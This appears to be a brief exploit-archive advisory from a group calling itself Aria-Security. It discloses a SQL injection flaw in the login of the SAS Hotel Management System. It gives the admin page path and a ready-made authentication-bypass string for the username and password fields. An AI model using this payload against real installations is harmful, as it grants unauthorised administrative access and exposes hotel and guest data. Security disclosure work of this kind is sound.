SAS Hotel Management System suffers from a SQL injection vulnerability in the username and password login fields.
02d6c40b877ebedc674c60b3608b07ac9fa4f74433227c21e65ec8f6eebe544d
__________________________
A R I A - S E CU R I T Y
___________________________
SAS Hotel Management System SQL Injection
http://www.sellatsite.com/sellatsite/hotel.asp
Explanation:
http://path/admin/admin.asp
Username: anything' OR 'x'='x
password: anything' OR 'x'='x
Credits: Aria-Security Team
http://aria-security.net
http://outlaw.Aria-Security.net/ [PERSONAL BLOG]